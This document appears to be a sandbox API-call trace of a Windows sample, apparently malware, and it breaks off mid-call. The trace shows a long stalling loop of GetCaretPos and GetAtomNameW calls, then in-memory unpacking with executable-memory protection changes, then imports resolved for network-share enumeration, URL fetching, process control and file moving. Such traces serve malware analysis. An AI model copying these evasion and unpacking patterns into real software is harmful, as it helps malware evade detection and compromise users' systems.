[0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.203] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.203] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.203] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.203] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.204] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.204] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.205] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.205] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.206] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.206] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.207] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.207] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.208] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.208] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.209] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.209] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.209] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.209] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.209] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.209] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.209] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.209] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.209] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.209] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.209] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.209] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.209] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0194.886] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x759e0000 [0194.979] VirtualProtect (in: lpAddress=0x240020, dwSize=0x90e08, flNewProtect=0x40, lpflOldProtect=0x18e670 | out: lpflOldProtect=0x18e670*=0x4) returned 1 [0195.103] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x759e0000 [0195.103] GetProcAddress (hModule=0x759e0000, lpProcName="GlobalAlloc") returned 0x759f588e [0195.103] GetProcAddress (hModule=0x759e0000, lpProcName="GetLastError") returned 0x759f11c0 [0195.103] GetProcAddress (hModule=0x759e0000, lpProcName="Sleep") returned 0x759f10ff [0195.104] GetProcAddress (hModule=0x759e0000, lpProcName="VirtualAlloc") returned 0x759f1856 [0195.104] GetProcAddress (hModule=0x759e0000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a1735f [0195.104] GetProcAddress (hModule=0x759e0000, lpProcName="Module32First") returned 0x75a75cd9 [0195.104] GetProcAddress (hModule=0x759e0000, lpProcName="CloseHandle") returned 0x759f1410 [0195.104] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0195.107] Module32First (hSnapshot=0x58, lpme=0x18ec00) returned 1 [0195.109] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x1de0000 [0195.245] GetProcAddress (hModule=0x759e0000, lpProcName="LoadLibraryA") returned 0x759f49d7 [0195.260] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x759e0000 [0195.261] GetProcAddress (hModule=0x759e0000, lpProcName="VirtualAlloc") returned 0x759f1856 [0195.261] GetProcAddress (hModule=0x759e0000, lpProcName="VirtualProtect") returned 0x759f435f [0195.264] GetProcAddress (hModule=0x759e0000, lpProcName="VirtualFree") returned 0x759f186e [0195.264] GetProcAddress (hModule=0x759e0000, lpProcName="GetVersionExA") returned 0x759f3519 [0195.266] GetProcAddress (hModule=0x759e0000, lpProcName="TerminateProcess") returned 0x75a0d802 [0195.266] GetProcAddress (hModule=0x759e0000, lpProcName="ExitProcess") returned 0x759f7a10 [0195.277] GetProcAddress (hModule=0x759e0000, lpProcName="SetErrorMode") returned 0x759f1b00 [0195.277] SetErrorMode (uMode=0x400) returned 0x0 [0195.278] SetErrorMode (uMode=0x0) returned 0x400 [0195.279] GetVersionExA (in: lpVersionInformation=0x18db30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}3w") | out: lpVersionInformation=0x18db30*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0195.279] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1f00000 [0195.361] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ebb8 | out: lpflOldProtect=0x18ebb8*=0x2) returned 1 [0196.293] VirtualFree (lpAddress=0x1f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.341] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x750a0000 [0196.341] GetProcAddress (hModule=0x750a0000, lpProcName="RpcStringFreeW") returned 0x750c1635 [0196.353] GetProcAddress (hModule=0x750a0000, lpProcName="UuidCreate") returned 0x750bf48b [0196.354] GetProcAddress (hModule=0x750a0000, lpProcName="UuidToStringW") returned 0x750e1ee5 [0196.354] GetProcAddress (hModule=0x750a0000, lpProcName="RpcStringFreeA") returned 0x750e3fc5 [0196.370] GetProcAddress (hModule=0x750a0000, lpProcName="UuidToStringA") returned 0x7511d918 [0196.371] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74c90000 [0196.539] GetProcAddress (hModule=0x74c90000, lpProcName="WNetOpenEnumW") returned 0x74c92f06 [0196.540] GetProcAddress (hModule=0x74c90000, lpProcName="WNetEnumResourceW") returned 0x74c93058 [0196.540] GetProcAddress (hModule=0x74c90000, lpProcName="WNetCloseEnum") returned 0x74c92dd6 [0196.540] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75be0000 [0196.561] GetProcAddress (hModule=0x75be0000, lpProcName="InternetCloseHandle") returned 0x75bfab49 [0196.561] GetProcAddress (hModule=0x75be0000, lpProcName="InternetReadFile") returned 0x75bfb406 [0196.562] GetProcAddress (hModule=0x75be0000, lpProcName="InternetOpenUrlW") returned 0x75c5be5c [0196.562] GetProcAddress (hModule=0x75be0000, lpProcName="InternetOpenW") returned 0x75c09197 [0196.562] GetProcAddress (hModule=0x75be0000, lpProcName="HttpQueryInfoW") returned 0x75c05c75 [0196.562] GetProcAddress (hModule=0x75be0000, lpProcName="InternetOpenA") returned 0x75c0f18e [0196.562] GetProcAddress (hModule=0x75be0000, lpProcName="InternetOpenUrlA") returned 0x75c230f1 [0196.562] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74c50000 [0197.125] GetProcAddress (hModule=0x74c50000, lpProcName="timeGetTime") returned 0x74c526e0 [0197.125] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75d40000 [0197.125] GetProcAddress (hModule=0x75d40000, lpProcName="PathAppendA") returned 0x75d4d65e [0197.125] GetProcAddress (hModule=0x75d40000, lpProcName="PathFindFileNameW") returned 0x75d5bb71 [0197.126] GetProcAddress (hModule=0x75d40000, lpProcName="PathRemoveFileSpecW") returned 0x75d53248 [0197.126] GetProcAddress (hModule=0x75d40000, lpProcName="PathFileExistsA") returned 0x75d7ad1a [0197.126] GetProcAddress (hModule=0x75d40000, lpProcName="PathFileExistsW") returned 0x75d545bf [0197.126] GetProcAddress (hModule=0x75d40000, lpProcName="PathAppendW") returned 0x75d581ef [0197.126] GetProcAddress (hModule=0x75d40000, lpProcName="PathFindExtensionW") returned 0x75d5a1b9 [0197.126] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759e0000 [0197.126] GetProcAddress (hModule=0x759e0000, lpProcName="VirtualFree") returned 0x759f186e [0197.126] GetProcAddress (hModule=0x759e0000, lpProcName="WriteFile") returned 0x759f1282 [0197.126] GetProcAddress (hModule=0x759e0000, lpProcName="GetDriveTypeA") returned 0x75a0ef75 [0197.126] GetProcAddress (hModule=0x759e0000, lpProcName="OpenProcess") returned 0x759f1986 [0197.127] GetProcAddress (hModule=0x759e0000, lpProcName="GlobalAlloc") returned 0x759f588e [0197.127] GetProcAddress (hModule=0x759e0000, lpProcName="GetSystemDirectoryW") returned 0x759f5063 [0197.127] GetProcAddress (hModule=0x759e0000, lpProcName="WideCharToMultiByte") returned 0x759f170d [0197.127] GetProcAddress (hModule=0x759e0000, lpProcName="LoadLibraryW") returned 0x759f492b [0197.127] GetProcAddress (hModule=0x759e0000, lpProcName="Sleep") returned 0x759f10ff [0197.127] GetProcAddress (hModule=0x759e0000, lpProcName="CopyFileW") returned 0x75a1830d [0197.127] GetProcAddress (hModule=0x759e0000, lpProcName="FormatMessageW") returned 0x759f4620 [0197.127] GetProcAddress (hModule=0x759e0000, lpProcName="lstrcpynW") returned 0x75a1d556 [0197.127] GetProcAddress (hModule=0x759e0000, lpProcName="CreateProcessA") returned 0x759f1072 [0197.128] GetProcAddress (hModule=0x759e0000, lpProcName="TerminateProcess") returned 0x75a0d802 [0197.128] GetProcAddress (hModule=0x759e0000, lpProcName="ReadFile") returned 0x759f3ed3 [0197.128] GetProcAddress (hModule=0x759e0000, lpProcName="CreateFileW") returned 0x759f3f5c [0197.128] GetProcAddress (hModule=0x759e0000, lpProcName="lstrcatA") returned 0x75a12b7a [0197.128] GetProcAddress (hModule=0x759e0000, lpProcName="GetEnvironmentVariableA") returned 0x759f33a0 [0197.128] GetProcAddress (hModule=0x759e0000, lpProcName="lstrcmpW") returned 0x759f5929 [0197.128] GetProcAddress (hModule=0x759e0000, lpProcName="MultiByteToWideChar") returned 0x759f192e [0197.128] GetProcAddress (hModule=0x759e0000, lpProcName="lstrlenW") returned 0x759f1700 [0197.128] GetProcAddress (hModule=0x759e0000, lpProcName="FlushFileBuffers") returned 0x759f469b [0197.129] GetProcAddress (hModule=0x759e0000, lpProcName="GetShortPathNameA") returned 0x75a1594d [0197.129] GetProcAddress (hModule=0x759e0000, lpProcName="GetFileSizeEx") returned 0x759f59e2 [0197.129] GetProcAddress (hModule=0x759e0000, lpProcName="GetLastError") returned 0x759f11c0 [0197.129] GetProcAddress (hModule=0x759e0000, lpProcName="SetLastError") returned 0x759f11a9 [0197.129] GetProcAddress (hModule=0x759e0000, lpProcName="GetProcAddress") returned 0x759f1222 [0197.129] GetProcAddress (hModule=0x759e0000, lpProcName="VirtualAlloc") returned 0x759f1856 [0197.129] GetProcAddress (hModule=0x759e0000, lpProcName="MoveFileW") returned 0x75a09af0 [0197.129] GetProcAddress (hModule=0x759e0000, lpProcName="FindClose") returned 0x759f4442 [0197.129] GetProcAddress (hModule=0x759e0000, lpProcName="Process32FirstW") returned 0x75a18baf [0197.130] GetProcAddress (hModule=0x759e0000, lpProcName="LocalAlloc") returned 0x759f168c [0197.130] GetProcAddress (hModule=0x759e0000, lpProcName="CreateEventW") returned 0x759f183e [0197.130] GetProcAddress (hModule=0x759e0000, lpProcName="GetModuleFileNameA") returned 0x759f14b1 [0197.130] GetProcAddress (hModule=0x759e0000, lpProcName="Process32NextW") returned 0x75a1896c [0197.130] GetProcAddress (hModule=0x759e0000, lpProcName="lstrcatW") returned 0x75a1828e [0197.130] GetProcAddress (hModule=0x759e0000, 